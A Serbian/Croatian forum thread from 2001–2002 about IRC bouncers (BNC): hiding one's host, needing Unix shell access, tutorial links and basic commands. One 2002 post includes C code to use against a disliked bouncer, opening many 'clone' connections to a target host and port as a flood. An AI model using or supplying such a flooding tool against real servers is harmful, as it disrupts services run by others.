[ Srki__ @ 06.09.2001. 01:39 ] @
totalni sam pocetnik sto se tice bnc
ako neko moze da me uputi i da mi pomogne da nabavim jedan
[ Bleya @ 06.09.2001. 01:45 ] @
Sta ce ti BNC ako vec oces samo da sakrivas ip dobar ti je i proxy
[ Srki__ @ 06.09.2001. 01:54 ] @
Citat:
Bleya je napisao:
Sta ce ti BNC ako vec oces samo da sakrivas ip dobar ti je i proxy


zato sto je bnc bolji
[ stinger @ 06.09.2001. 10:26 ] @
da bi koristio bnc potreban ti je linux b0x na kome mozes da iskompajliras i podignes isti, ako to posedujes onda treba da skines bnc source, sto mozes naci na : http://www.eggsource.com/bnc/
a malo detaljnije na : http://www.eggsource.com/bnc/bnc.php?title=tutorial&id=t0001

bnc moze da ti pruzi samo da sakrijes svoj host i da umesto njega stavis host od te masine na kojoj dignes bnc. a sto se tice upotrebe bnc-a ukoliko posedujes vise od 5 razlicitih hostova, ti pusti mastu na volju ... :)

e sad, mislim da mozes i sa ovim winbouncer-om da se igras ali ne znam kolko je "cist" kod, tj da li nema neki backdoor, ako os da se igras & experimentises :
http://www.fortunecity.com/ben...tman/13/vigfiles/winbounce.zip
[ UroS @ 06.09.2001. 14:57 ] @
zbog cega bas vise od 5 razlicitih hostova ?
[ Srki__ @ 06.09.2001. 20:57 ] @
znaci ako nemam taj linux b0x ne mogu da imam ni bnc??
[ Gojko Vujovic @ 06.09.2001. 21:13 ] @
Mislio je na shell pristup na nekom kompjuteru pod *nixom, niti mora linux, niti mora da je ceo box (masina) tvoj, itd..
[ Srki__ @ 07.09.2001. 10:56 ] @
aha
a sta je shell i bnc source i koji je moj prvi korak u dizanju bnc
[ Gojko Vujovic @ 07.09.2001. 11:26 ] @
Definicija za 'shell'..

http://searchsolaris.techtarge...ion/0,,sid12_gci212978,00.html

Shell is a UNIX term for the interactive user interface with an operating system. The shell is the layer of programming that understands and executes the commands a user enters. In some systems, the shell is called a command interpreter. A shell usually implies an interface with a command syntax (think of the DOS operating system and its "C:>" prompts and user commands such as "dir" and "edit").
As the outer layer of an operating system, a shell can be contrasted with the kernel, the operating system's inmost layer or core of services.

A sto se tice instalacije BNC-a, ako ni ne znas sta je shell, onda ga sigurno nemas i tesko ces instalirati BNC dok ga ne nabavis. A i jednostavnije uputstvo korak po korak od onog na adresi http://www.eggsource.com/bnc/bnc.php?title=tutorial&id=t0001 ces tesko naci..
[ BORG @ 07.09.2001. 11:31 ] @
Kada je vec rijec o bnc-u to je prava stvar...zanima me gdje ima shell da se nabavi?

[ Gojko Vujovic @ 07.09.2001. 11:49 ] @
Pun ti je net sajtova koji to nude. Na primer: http://www.en.unixshells.de/
[ UroS @ 07.09.2001. 13:49 ] @
naravno za pare

i to prave pare

linux b0x respect!
[ BORG @ 07.09.2001. 14:13 ] @
Ma treba mi shell sa background procesom...nasao sam neke shellove...vidjecemo...mislio sam na free shell sa bg.procesima..
[ LoLeK @ 09.03.2002. 12:46 ] @
Borg daj da provjerimo taj free shell :))
A ako vam se nesvidja neciji BNC probajte ovo :)

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>

#define L 256

struct hostent *server;
struct sockaddr_in bnc;
int clones,port;

int main(int argc, char *argv[])
{
int i;
int sock;
char buffer[L];
if (argc < 4)
{
printf("Ú usage; %s <server> <port> <clones> nŔÄ- -> %s shiznit.com 9000
300n", argv[0], argv[0]);
exit(0);
}
if ((server = gethostbyname(argv[1])) == NULL)
{
printf("Can not resolve server.n", argv[1]);
exit(0);
}
port=atoi(argv[2]);
clones=atoi(argv[3]);
for(i = 0;i < clones; i++)
{
bcopy(server->h_addr, &bnc.sin_addr, server->h_length);
bnc.sin_family = AF_INET;
bnc.sin_port = htons(port);
if((sock = socket(AF_INET, SOCK_STREAM, 6)) == -1)
{
printf("error; couldnt create raw socketn", argv[1]);
exit(0);
}
connect(sock, (struct sockaddr *) &bnc, sizeof(bnc));
sprintf(buffer, "USER die - -: %sn", argv[1]);
write(sock, buffer, strlen(buffer));
sprintf(buffer, "NICK dien", argv[1]);
write(sock, buffer, strlen(buffer));
bzero(buffer, L);

}
printf("Clones connected, exploit finished.n", argv[1]);
}
[ sablja @ 23.06.2002. 08:24 ] @
Covek , ako hoces za dzabaka onda ti je najpogodnije da se raspitas na IRC-u ko ima admina na nekom bnc-u (a ima ih dosta) ... malo mu se ulizes i eto ga nalog za tebe :)
Onda neke osnovne komandice su /addserver host:port
/bwho
/jump
/bconnect
/setawaynick <nick>

c ya :)